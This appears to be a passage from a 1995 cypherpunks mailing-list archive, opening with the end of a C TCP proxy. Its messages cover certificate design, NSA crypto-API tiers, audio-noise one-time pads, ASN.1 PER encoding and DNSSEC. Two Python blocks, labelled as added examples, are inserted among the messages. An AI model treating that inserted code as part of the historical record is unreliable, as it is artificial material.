	if (connect(fd, (struct sockaddr *)&si, sizeof(si)) < 0) {
		perror("connect"); exit(1);
	}
	return(fd);
}

int localinit(int port)
{
	struct sockaddr_in thissock;
	int	s, i;

	if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		perror("socket"); exit(1);
	}

	memset((char *)&thissock, 0, sizeof(struct sockaddr_in));
	thissock.sin_family = AF_INET;
	thissock.sin_port = htons(port);	/* network byte order */
	thissock.sin_addr.s_addr = htonl(INADDR_ANY);
 
	i = 1;
	setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&i, sizeof(int));

	if (bind(s, (struct sockaddr *)&thissock, sizeof(struct sockaddr_in)) < 0) {
		perror("bind"); exit(1);
	}
	if (listen(s, 5) < 0) {
		perror("listen"); exit(1);
	}

	return(s);
}

void usage(void)
{
	fprintf(stderr, "Usage: proxy localport remotehost remoteport\n");
	exit(1);
}


int main(int argc, char **argv)
{
	int	partialxfd, xfd, yfd, localport, remoteport;
	socklen_t	i;
	struct sockaddr_in thatsock;
	char *remotehost;

	if (argc != 4)
		usage();
	localport = atoi(argv[1]);
	remotehost = argv[2];
	remoteport = atoi(argv[3]);
	if (localport < 1024 || remoteport <= 0)
		usage();

	partialxfd = localinit(localport);

	/* serve one connection at a time, forever */
	for (;;) {
		i = sizeof(struct sockaddr_in);
		if ((xfd = accept(partialxfd, (struct sockaddr *)&thatsock, &i)) < 0) {
			perror("accept"); exit(1);
		}
  
		yfd = remoteinit(remotehost, remoteport);
		proxy(xfd, yfd);
		close(xfd); close(yfd);	/* release both sockets before the next connection */
	}
}



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 2 Oct 95 14:48:34 PDT
To: Carl Ellison <cme@TIS.COM>
Subject: Re: Certificate proposal
Message-ID: <199510022148.OAA26396@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 AM 10/2/95 EDT, Carl Ellison <cme@TIS.COM> wrote:
>X.509 certificates are not totally bad.  Their structure contains lessons
>for anyone designing a certificate structure.  [Raw X.509 does not imply a
>hierarchy, I believe.  Steve Kent & Co. do.]

I agree with you about hierarchies, and even RFC1422 doesn't really force you
to use hierarchy, much less a government-enforced one, though it clearly 
prefers it, and it definitely does support the concept of having a key signed
by more than one CA, at least for CA's keys.  The most important differences,
from my perspective, are
1) X.509 explicitly addresses Certificate Revocation Lists, though it
        isn't real precise about how they should be distributed, and the
        hierarchical approach isn't necessarily the best.  (Maybe put the 
        location of the preferred CRL for a key certificate in the cert itself?)
2) X.509 certificates, unlike PGP, only support one signer per certificate;
        this is a slight hierarchical bias, which forces you to haul around a 
        pile of certificates to have multiply signed keys, without specifying
        a syntax, so simple key-cert programs may not know what to do with
        multiples, and hence force hierarchy; the rest of us will just have
        to deal with multiple syntaxes.  But that's mainly a verbosity
        problem, duplicating Distinguished Names and key info.
3) Neither PGP nor X.509 (as documented in the RFC1422 and PKCS#6) have any
        mechanism for additional information other than cramming it into
        the username, but supposedly X.509 Version 3 includes something?

>Perhaps the biggest problem is the use of a name -- a text string (or some
>abortion like the DN which can be reduced to a text string) -- as the
>anchor point.    [.... use the public key instead ....]
>What remains is a need for attributes to be bound to a key.  ...
>Current certificates are going down a fundamentally wrong path.  They are
>trying to bind keys to people and let Society somehow bind attributes to
>people -- but the latter binding is too weak to permit keys to be bound to
>attributes or permissions.

Eventually, there may be a way to represent most of the attributes you want
to describe in some format, which I dare say will look _far_ uglier than
ASN.1 :-)
Binding a key to a text-string usually representing a person does give you
the slack to use other mechanisms rather than wait for the release of
/standard-name="Attribute Semantics Notation"/version=32769/ORG="International Slowness Organization"/Country=none/reliability=ExtremelyHighTrustUsThisTime/versionhistory=

For now, there do seem to be some kinds of attributes that would benefit from
better representations than a human-name plus free-form text, such as
"which application does the user want you to use this key for?" "how much
should I trust the user's desire to have me use that key for that application?"
"how do I get this key's owner to give me money?" "does the key-holder
have the authority to speak for a given organization/human/bank account?"
If you look at Verisign's DNs, or the text in my PGP keys, you'll see various
ugly attempts at this.

And then there's "WHICH person named Bill Stewart does this key belong to?"
For the latter, I'm interested in solutions other than "Social Security Number",
"Citizen-Unit Nationalized ID Card Number", etc.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Mon, 2 Oct 95 12:36:47 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: CJR for perl-RSA t-shirt
Message-ID: <v02130500ac9540e8bac8@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:58 10/1/95, Robert Hettinga wrote:
>>Subject:  Mass Market Software with Encryption - 15 Day Expedited Review
>>          Requested
>>
>>Subject:  Commodity Jurisdiction Request for
>>          perl-RSA t-shirt, an encryption program
>
>ROTFL!
>

I agree. I especially laughed at the part that stated "... also as a bar
code, making the t-shirt machine readable as well as machine washable."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 2 Oct 95 13:18:02 PDT
To: cypherpunks@toad.com
Subject: Crypto APIs
Message-ID: <199510022029.QAA05671@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


A couple of weeks ago I attended a meeting at the NATO SHAPE Technical
Center in the Hague to discuss international cryptographic APIs.  Several
high-ranking NSA types were there, as well as their counterparts from
various NATO countries plus a handful of industry crypto people (like
me).  The idea of the meeting was to find a way to separate
cryptographic function from cryptographic interfaces, in a way that
allows the applications that call the cryptographic functions to be
more freely exported.  That is, I can write and export an application
that calls the crypto API but that doesn't actually implement the
cryptography, and then, when it reaches its destination, the
locally-preferred cryptosystem can be plugged right in.  Crypto might
be implemented in hardware (e.g., Fortezza) or software (e.g., with a
shared library or pseudo-device driver).

Obviously, this idea is somewhat (completely?) at odds with the
criteria presented at last month's NIST workshops for exportable
software key escrow systems.  One of the requirements given for such
systems is that it be difficult to replace the crypto with something
that doesn't implement key escrow.  But who ever said the government
was consistent?  Interestingly, it was clear that many people in NSA
believe that applications that call an API are controlled under ITAR,
but there is some recognition that this may be wishful thinking or may
change soon.  So while some (maybe most) of NSA wants to prevent
development of standard APIs and prevent the export of applications
that use them, others recognize that these will evolve by themselves
anyway and will be very hard to control once they do.  Anyway, the
situation is far from clear.  It seems best to encourage the realistic
side of NSA as much as possible...

I learned a few interesting things at the meeting.  First of all,
overwhelmingly, there is recognition, especially on the part of the
non-US government security agencies, that there is enormous value in
being able to buy off-the-shelf applications like Microsoft Word or
Netscape Navigator and just plugging in the local military cryptosystem
and using it for classified traffic.  Everyone seemed to agree that
there is a growing need for this and that it's too expensive to rely
on custom software.  There is also movement away from the traditional
military ``link encryption'' approach that involves centrally-
controlled secure networks in favor of a ``risk management'' approach
that favors end-to-end security with off-the-shelf products.  In other
words, the parts of the military that are concerned with actually
securing communications want exactly what we want, and are just
starting to realize it.  While lots of us have always known this, I
had never heard it articulated as quite clearly (or as loudly) by
actual comsec/infosec people before.

Second, the senior NSA guy mentioned a few things I hadn't heard
before.  Fortezza is now approved for classified traffic through the
SECRET level.  Also, the ``type 1'' (classified) through ``type 4''
(unevaluated) cryptography standard is being scrapped in favor of a
three ``tier'' system, as follows (these are approximate quotes, from
my rough notes):

Tier 1 traffic is stuff related to ``national command authority''.
(Seems to be secret and top secret and up).  It will require NSA
cryptosystems, hardware implementation, and will NOT employ key escrow
(because of the ``obvious risks''!).

Tier 2 traffic is information that, if disclosed, would have
``national implications'' if revealed.  Examples given include things
like the national power grid, the banking system, etc.  It was
unclear whether any classified traffic would be included in tier 2.
Clearly, some of what is now called ``sensitive but unclassified''
(SBU) will be in tier 2.  Anyway, tier 2 systems will be approved by
NIST (not NSA, although there will obviously be NSA input into the
standards) and will require hardware implementation.  Tier 2 traffic
will be escrowed, and the government will escrow its own keys.
Fortezza is an example tier 2 device (but read on...)

Tier 3 traffic will be that which would have ``private implications''
if disclosed.  Examples given included personal financial and medical
records, etc.  Current SBU traffic not in tier 2.  Tier 3 would also
be handled by NIST, employ commercial or government key escrow (like
tier 2) and would be permitted to be implemented in software.

Here's the surprise: Tiers 2 and 3 will be interoperable.  So there
will be published algorithms for tier 3.  It is possible that tiers 2
and 3 will have the same algorithms, and that the government will
suggest them.  It was unclear whether interoperability will require that
all tier 2 algorithms will be published and implementable in tier 3
software or whether this means that tier 2 devices will also have to
implement the tier 3 algorithms.  There is an obvious choice of a tier
2/3 algorithm: Skipjack (although there were concerns that this is
``too slow'').  So we may eventually find out whether ``S1'' was
really Skipjack after all....

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Mon, 2 Oct 95 08:40:32 PDT
To: cypherpunks@toad.com
Subject: One-Time-Pad generation from audio device
Message-ID: <Pine.3.89.9510021627.A14466-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Over the weekend I hacked up a one-time-pad generator from the random 
number code I've been writing for Privtool, which uses noise from the 
audio device to generate random numbers.

The code basically reads in a 512-byte block from /dev/audio, then takes
the MD5 of that block to generate 16 bytes of the OTP. The raw audio data
I'm getting is not particularly random and will compress by 3:1 using gzip
or compress, so I'm assuming that using a 32:1 ratio here via MD5 will
give a truly random output (it's certainly uncompressible).

Before I release the source code to the Net, can anyone give me any good
reasons to believe that this won't produce physically random output, or
make suggestions on how to test, or improve, the generated output ? There's
a #define which can be used to easily increase the amount of data fed into
the MD5, but at the moment it will only generate about 1 MB per hour on a
Sparcstation (limited by the audio input rate), so I don't want to
increase that if I don't have to. 

	Mark
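
The scheme described in the message above (hash each 512-byte block of raw samples down to 16 bytes), written out as an added example; this is not the Privtool code. It shows why the randomness has to be estimated on the raw samples: the hashed output is incompressible even when the input carries almost no entropy. The sample data is constructed, and the function names, the most-common-value estimator and the 2x safety margin are assumptions of this example.

```python
import hashlib
import math
import random
import zlib
from collections import Counter

BLOCK = 512   # raw bytes fed to each hash, as in the message
OUT = 16      # bytes produced per block (MD5 digest size)


def distill(raw, block=BLOCK):
    """MD5 every full block of raw samples and concatenate the digests."""
    out = bytearray()
    for start in range(0, len(raw) - block + 1, block):
        out += hashlib.md5(raw[start:start + block]).digest()
    return bytes(out)


def min_entropy_per_byte(raw):
    """Most-common-value estimate, -log2(p_max), in bits per sample.

    It treats samples as independent, so for correlated audio it is an
    optimistic upper bound on the real min-entropy.
    """
    p_max = max(Counter(raw).values()) / len(raw)
    return -math.log2(p_max)


def compression_ratio(data):
    """Input size over zlib-compressed size (a coarse redundancy check)."""
    return len(data) / len(zlib.compress(data, 9))


def block_budget(raw, block=BLOCK, out=OUT, margin=2.0):
    """Compare estimated entropy entering each hash with the bits leaving it.

    Returns (bits_in, bits_out, ok); ok requires margin * bits_out of
    estimated input entropy. The margin is an assumption of this example.
    """
    bits_in = min_entropy_per_byte(raw) * block
    bits_out = out * 8
    return bits_in, bits_out, bits_in >= margin * bits_out


def constructed_noisy(n_blocks, seed=1995):
    """Constructed stand-in for a live input: mid-scale plus Gaussian noise."""
    rng = random.Random(seed)
    return bytes(
        min(255, max(0, round(rng.gauss(128, 2.0))))
        for _ in range(n_blocks * BLOCK)
    )


def constructed_dead(n_blocks):
    """Constructed stand-in for a dead input: silence plus a block counter."""
    return b"".join(
        i.to_bytes(4, "big") + b"\x7f" * (BLOCK - 4) for i in range(n_blocks)
    )


if __name__ == "__main__":
    for name, raw in (("noisy", constructed_noisy(64)),
                      ("dead", constructed_dead(64))):
        pad = distill(raw)
        bits_in, bits_out, ok = block_budget(raw)
        print(f"{name}: raw compresses {compression_ratio(raw):.2f}:1, "
              f"pad compresses {compression_ratio(pad):.2f}:1, "
              f"~{bits_in:.0f} bits in per {bits_out} bits out, ok={ok}")
```

Both pads come out incompressible, but only the noisy source has an entropy budget above what each digest emits; the check that matters is on the raw samples, not on the hashed output.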





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael shiplett <walrus@ans.net>
Date: Mon, 2 Oct 95 13:54:35 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: Crypto APIs
In-Reply-To: <199510022029.QAA05671@crypto.com>
Message-ID: <199510022054.QAA80371@bugsy.aa.ans.net>
MIME-Version: 1.0
Content-Type: text/plain


"mb" == Matt Blaze <mab@crypto.com> writes:

mb> A couple of weeks ago I attended a meeting at the NATO SHAPE
mb> Technical Center in the Hague to discuss international
mb> cryptographic APIs.

  Is there any overlap between this effort and TIS' International
Cryptography Experiment (ICE)?

michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 2 Oct 95 14:09:07 PDT
To: Doug.Hughes@eng.auburn.edu
Subject: Re: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: <199510020556.WAA01007@comsec.com>
Message-ID: <9510022103.AA10569@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: Doug Hughes <Doug.Hughes@eng.auburn.edu>
>Date: Thu, 28 Sep 1995 19:31:00 -0500



>A company in Israel named Elementrix has just announced at Interop an
>entirely new paradigm in secure transactions. They have a secure
>one time pad that allows people to exchange mail and ftp files back
>and forth in complete security without the worries of key management
>or storage or secure random number generation or synchronization.


As far as I could tell from your description, this is an autokey cipher --
not an OTP.

An autokey cipher starts with a shared secret key and uses previous
plaintext or ciphertext as part of the key.  DES CBC is an autokey cipher.

The original autokey used previous plaintext or ciphertext as the only key.
More modern ones mix in the previous text.

I had a design for one, several years ago, which kept a mapping in memory
and changed the mapping based on incoming plaintext.  Therefore, there is
state information kept at both sides which keeps changing.

One might think that if the attacker never gets in, today's randomness is
just as good as yesterday's.  That might even be true.  However, there are
many openings for finding relationships between yesterday's and today's
ciphertexts.

I look forward to seeing the actual algorithm.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 2 Oct 95 13:59:33 PDT
To: michael shiplett <walrus@ans.net>
Subject: Re: Crypto APIs
In-Reply-To: <199510022054.QAA80371@bugsy.aa.ans.net>
Message-ID: <199510022110.RAA05985@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> "mb" == Matt Blaze <mab@crypto.com> writes:
> 
> mb> A couple of weeks ago I attended a meeting at the NATO SHAPE
> mb> Technical Center in the Hague to discuss international
> mb> cryptographic APIs.
> 
>   Is there any overlap between this effort and TIS' International
> Cryptography Experiment (ICE)?
> 
> michael

Yes.  (ICE, by the way, is funded by ARPA and run by TIS.  Strange notion
of "experiment", given that the result of the "experiment" will be to see
whether the government will allow it.  So one part of DoD is funding TIS
to find out how another part of DoD behaves...)

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 2 Oct 95 17:11:33 PDT
To: Carl Ellison <cme@TIS.COM>
Subject: De Re ASN.1 and encoding rules ( was Re: X.509,...)
In-Reply-To: <9510021511.AA10057@tis.com>
Message-ID: <Pine.SOL.3.91.951002141516.6137B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


In his message Carl makes several statements, some of which I agree with,
and some which I disagree with. Since I'm a protocol wonk, and since I've
been doing ASN.1 and PER/BER stuff recently, I'd like to respond to some
of his points. 

(I spent most of last week off work with a nasty cold,
semi-comatose on the couch, smothered in vapo-rub, surrounded by the 93
specs for ASN.1, BER/DER, and PER, and with nothing on TV but the OJ trial.
What a choice :-)

[A lot of this is leading up to a big rant about the truly ghastly 
packet formats given to us by STT, which I've found loosens more mucus 
than a gallon of cough syrup, and with much the same effect on your 
mental state :-)]

I'm not going to be defending BER (BrainDamaged Encoding Rules), because, 
let's face it, they suck. I'm also not going to be defending X.500, 
because, to a first approximation it completely sucks too. 

In this message I'm just going to address the issue of the inherent
inefficiency - I'll address the rest in a follow-up message, most
specifically the claim that making marshalling and de-marshalling hard on
the implementor is a good thing. 

It's hard to speak to the issue of code size, since the ISODE compilers,
which are frequently used as a benchmark in this area are so goddam
awful. Even the most naive compilers will generally generate code orders
of magnitude smaller. Instead, we'll take a look at bits on the wire,
and compare the struct dump to what can be done by a 20th century
compiler using a smart set of encoding rules (PER - the packed encoding
rules). 

[ as a side note, I recently wrote some code that had to parse and 
process X.509 certificates - this was for my SSL Keep-Away proxy (it 
needed to crunch the certificate, look for hostname matches in any CN
values, and possibly convert the DN into RFC1485 text format). The 
source was only a few K. I was using C++ though (and this didn't hurt 
for once)]


Let's use 3DES as our example. We'll start with a naive specification:

--
LongLong ::= OCTET STRING (SIZE(8)) -- a long long is 8 bytes, er, long
DesKey ::= LongLong
ThreeDes ::= SEQUENCE {
	IV LongLong,
	K1 DesKey,
	K2 DesKey,
	K3 DesKey
}
--
Let's apply the packed encoding rules to this: 
ThreeDes is a SEQUENCE. It has no optional components, so no bits are added
to the encoding. 
The first item, IV, is an OCTET STRING of fixed length 8 bytes. Since the 
length is fixed, no length is encoded - the 8 bytes of the IV are 
appended to the encoding. The same applies to each of the des keys.
 
Thus, we have a bits on the wire total of 32 bytes. The same as in the 
hand crafted encoding. The encoding and decoding are then implemented as 
memcpys. If more information is known about the alignment and position 
in memory  of the fields, and of the key within the buffer, these memcpys can 
be coalesced - this is a local optimisation, rather than a requirement that 
every interoperable implementation use the same language with the same 
compiler.

Now, this example is pretty simple, but with not much thought, we can set 
about improving it to generate fewer bits on the wire. I'll avoid the 
obvious kludge, which is to strip off the parity bytes on each key to save 
three bytes - instead we'll look to the big wins. 

There are several different ways of using 3des which can help us reduce
the size of the encodings in some cases. The first thing we can do is
support variable size IVs (like in rfc1851). We'll restrict the IV to be
either 1 or 2 32 bit chunks. Then we can add extra support for 1des mode
of 3des where all the keys are the same. 

Here's the new definitions:

--
Long ::= OCTET STRING (SIZE(4))

ThreeDes ::= SEQUENCE {
	IV SEQUENCE (SIZE(1..2)) OF Long,
	Key1 DesKey,
	Key2 DesKey OPTIONAL,
	Key3 DesKey OPTIONAL
}
--
Now let's see how the PER treat this value. 
The first thing we encode is the sequence. Since this sequence has 
optional components, we stick one bit onto the output stream for each 
field - if the bit is one, the optional element is present - otherwise, 
it ain't.  Since there are two optional components, we need two bits.

Next, we need to encode the IV. Since this field is of variable length, 
we do need to encode a length this time. The length is constrained to 
be between 1 and 2 - a range of 1 - the minimum number of bits needed to 
encode this is 1, and so a 1 bit field is appended to the encoding. 

Now we encode the longs in the IV; because these values are OCTET 
STRINGS, we need to align ourself on an octet boundary, if we're not 
there already. Once we've emitted any necessary pad bits, we encode the 
IV as the indicated number of 4 byte values. After that we encode the 
first key as described above, and if the second and third key are 
present, we encode those as well. 

If there is room for 3 bits in the byte preceding this encoding (a
likely occurrence, especially if the application supports several
different key types (RC4 & IDEA, etc)), this encoding is still 32 bytes
in the worst case, and 12 in the best case. 

To be continued... (unless I get flamed off the list)
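
The second walk-through in the message above, as an added bit-level model (not Simon Spero's code and not a complete PER implementation): two presence bits, a one-bit IV count, then octet-aligned fields. The 5-bit key-type selector that shares the leading byte, the helper names and the sample key bytes are assumptions of this example.

```python
class BitWriter:
    def __init__(self):
        self.bits = []

    def put(self, value, nbits):
        """Append the low nbits of value, most significant bit first."""
        for shift in range(nbits - 1, -1, -1):
            self.bits.append((value >> shift) & 1)

    def put_octets(self, data):
        """Pad with zero bits to an octet boundary, then append whole octets."""
        self.bits.extend([0] * (-len(self.bits) % 8))
        for byte in data:
            self.put(byte, 8)

    def to_bytes(self):
        bits = self.bits + [0] * (-len(self.bits) % 8)
        return bytes(
            sum(bit << (7 - j) for j, bit in enumerate(bits[i:i + 8]))
            for i in range(0, len(bits), 8)
        )


class BitReader:
    def __init__(self, data):
        self.data, self.pos = data, 0          # pos is a bit offset

    def get(self, nbits):
        if self.pos + nbits > len(self.data) * 8:
            raise ValueError("truncated encoding")
        value = 0
        for _ in range(nbits):
            byte = self.data[self.pos // 8]
            value = (value << 1) | ((byte >> (7 - self.pos % 8)) & 1)
            self.pos += 1
        return value

    def get_octets(self, count):
        self.pos += -self.pos % 8              # skip pad bits
        if self.pos + 8 * count > len(self.data) * 8:
            raise ValueError("truncated encoding")
        start = self.pos // 8
        self.pos += 8 * count
        return self.data[start:start + count]


def encode_three_des(w, iv, key1, key2=None, key3=None):
    """Write a ThreeDes value: iv is a list of one or two 4-octet chunks."""
    if len(iv) not in (1, 2) or any(len(chunk) != 4 for chunk in iv):
        raise ValueError("IV must be one or two 4-octet chunks")
    keys = [key1] + [k for k in (key2, key3) if k is not None]
    if any(len(k) != 8 for k in keys):
        raise ValueError("each DES key must be 8 octets")
    w.put(int(key2 is not None), 1)            # presence bit for Key2
    w.put(int(key3 is not None), 1)            # presence bit for Key3
    w.put(len(iv) - 1, 1)                      # IV count 1..2 as offset from 1
    for field in list(iv) + keys:
        w.put_octets(field)                    # first call inserts any padding


def decode_three_des(r):
    has_key2, has_key3 = r.get(1), r.get(1)
    count = r.get(1) + 1
    return {
        "iv": [r.get_octets(4) for _ in range(count)],
        "key1": r.get_octets(8),
        "key2": r.get_octets(8) if has_key2 else None,
        "key3": r.get_octets(8) if has_key3 else None,
    }


def encode_message(prefix_bits, prefix_value, iv, key1, key2=None, key3=None):
    """Encode after prefix_bits of earlier data (the assumed type selector)."""
    w = BitWriter()
    w.put(prefix_value, prefix_bits)
    encode_three_des(w, iv, key1, key2, key3)
    return w.to_bytes()


def decode_message(data, prefix_bits):
    r = BitReader(data)
    return r.get(prefix_bits), decode_three_des(r)


# Constructed sample values, not real key material.
IV_A, IV_B = bytes.fromhex("01020304"), bytes.fromhex("05060708")
K1, K2, K3 = (bytes([n]) * 8 for n in (0x11, 0x22, 0x33))

if __name__ == "__main__":
    best = encode_message(5, 0b10110, [IV_A], K1)
    worst = encode_message(5, 0b10110, [IV_A, IV_B], K1, K2, K3)
    print(len(best) - 1, len(worst) - 1)       # octets after the shared byte
```

With five bits already in the leading byte the three preamble bits fit exactly, so the structure adds 12 or 32 octets; a sixth prefix bit pushes the preamble across the boundary and costs one more octet of padding.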




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Mon, 2 Oct 95 14:25:45 PDT
To: "Kenneth E. Rowe" <kerowe@ncsa.uiuc.edu>
Subject: Re: DNS Security ( was Re: NetScape's dependence upon RSA down...)
In-Reply-To: <v02130502ac95bfa167d5@[141.142.150.60]>
Message-ID: <Pine.SUN.3.91.951002172133.1889C-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


Earlier versions of the dns-security draft did have a revocation mechanism
but the overwhelming consensus in the dns-security working group was to leave
that out of the first version.  I have on my queue writing up my ideas in
this area as a separate draft.  Feel free to write up yours. 

Donald

On Mon, 2 Oct 1995, Kenneth E. Rowe wrote:

> At 1:58 PM 10/1/95, Donald E. Eastlake 3rd wrote:
> >DNS security is an important point.  People not aware of efforts in this
> >area may want to check out draft-ietf-dnssec-secext-05.txt which has
> >more or less passed working group last call and is being considered by
> >the Security Area Directory / IESG.  Reference code is also available
> >(see message pasted at end below).
> >
> >Donald
> But the proposed DNS extension itself does not deal with CRL and Key
> Compromise Lists.
> 
> Ken.
> 
> -------------------------------------------------------------
> Kenneth E. Rowe  (kerowe@ncsa.uiuc.edu)
> Senior Security Engineer                (217) 244-5270 (Office)
>         / Security Coordinator          (217) 244-0710 (NCSA IRST)
> National Center for Supercomputing Applications
> *** email ncsa-irst@ncsa.uiuc.edu for computer incident response ***
> 
> 
> 

=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 2 Oct 95 15:03:37 PDT
To: raph@cs.berkeley.edu
Subject: Re: Certificate proposal
In-Reply-To: <199510021713.KAA15419@kiwi.cs.berkeley.edu>
Message-ID: <9510022200.AA15553@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: Raph Levien <raph@CS.Berkeley.EDU>
>Date: Mon, 02 Oct 1995 10:13:08 -0700

>I am extremely glad to hear Carl propose this. Let me propose something
>just a bit more concrete (Carl might not like it because it contains just
>a hint of ASN.1, but what the hell).

I'll hold my nose while reading :-).

>I propose that the unique name be the MD5 hash of the MOSS public key, as
>formatted according to the MOSS specification (ASCII and all). PGP keys
>can easily be converted into MOSS ones, so it's pretty easy. The hash
>should be expressed as 32 hex digits, so that it can easily be typed in
>or spoken. The only ambiguity in this proposal is where to put the
>newlines, if any. For concreteness, I propose that there be no newlines
>in the public key value.

I see no problem using a hash.  I might use SHA rather than MD5.  MD5 is a
wee bit too short.  But, for what we're doing, MD5 is just fine -- and as a
hash of a public key, the cost of finding alternatives is high enough that
MD5's shortness probably isn't a problem.

However, why convert PGP keys to MOSS and then hash?  Hash the PGP key
straight.

You're right that my proposal was not concrete at all.  To make it
concrete, you'd want to specify the signed message which takes the place of
a certificate.  I tried this once before, roughly, but I never gave it the
effort it deserves.

Let me call this non-certificate a blurk (waiting for a real name).

		------------------------------

For example, you need to identify:

the signee (a public key or hash of a key)
	the public key needs to be identified as to type (RSA, D-H, DSA, ...)
	and the package using it can also be identified (e.g., PGP, MOSS, ...)

the signer (a public key or hash of a key -- as used in the blurk which
	grants authority to the signer)

a text string (or paragraph) giving the attribute being attested to --
	and possibly giving validity dates, etc.

the signature (in some algorithm)  [You might want to allow for multiple
	signatures in different algorithms and/or different packages
	-- to keep the signee from having to send out dozens of blurks
	or storing dozens in a database.]

		------------------------------

The entire thing could be a signed cleartext message:

	signer's key; [signee's key; text] signature (of [])

Alternatively, you could modify the PGP UserID field (or make something
very similar) with raw text (not treated as an ID on the key) and a sig on
the text and signed key.

Signing a cleartext message has some appeal.

As for how this would be used -- my guess from looking at X.509 is that
it's meant for machine parsing and understanding (although I know of no
programs which follow them beyond sig checking).  A cleartext signed
message requires human reading and filing.  However, that's fine.  After
all, it is a human who decides whether to act or not.

If there is a computer deciding whether to act based on the blurk, the
signed text could include SMTP-style tagged text lines for the program to
go find.

Looking forward to more concrete elaborations....

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 2 Oct 95 15:16:12 PDT
To: baldwin@rsa.com
Subject: Re: Certificate proposal & X509 clarifications
In-Reply-To: <9509028126.AA812663445@snail.rsa.com>
Message-ID: <9510022213.AA15923@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 02 Oct 95 12:51:11 PST
>From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>


>	   The designers of version 1 of the X509 certificate format
>have realized that they need to allow issuers to attach all kinds
>of different attributes to a public key.  This led to version 3
>of the X509 format, which provides for general extensions.

However, in true ASN.1 form, they called for these extensions to be tied to
object identifiers (defining the attribute being defined).  Therefore, you
have to get someone owning an OBJID tree branch to define meanings for you
-- and you have to publish some worldwide book of mappings, etc.  To me,
this needs nothing more elaborate than text.  In fact, text is a fine
machine-independent coding.

[Thought experiment: imagine Postscript using ASN.1 coding rather than
ASCII.  How many Postscript printers would there be today?]

>	   Question: what's a good way to have the existing PGP public
>key infrastructure interoperate with the X509 infrastructure?

Answer: wait until X.509 dies under its own weight and let them ask how to
interoperate with PGP.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Publisher Program <TechSupport@jgc.com>
Date: Mon, 2 Oct 95 20:35:24 PDT
To: Techsupport@jgc.com
Subject: Introducing Johnson-Grace
Message-ID: <95Oct2.185011pdt.21953@mail.jgc.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Web Publisher:

You may have never heard of Johnson-Grace Company, but you have probably
seen the benefits of our image compression technology in America Online and
Apple's eWorld. "ART" compression substantially speeds up image transfers.
In fact, ART formatted images transmit three times faster over conventional
telephone lines than old-style GIFs and JPEGs. The immediate benefit is
dramatically more compelling online content.

Many of the hottest areas on AOL and eWorld are taking advantage of ART
technology, including ABC, Business Week, The Smithsonian, NY Times, and
800-Flowers. Now, Johnson-Grace is able to offer the same benefit to Web
publishers.

To help you immediately reap the rewards of ART image compression on your
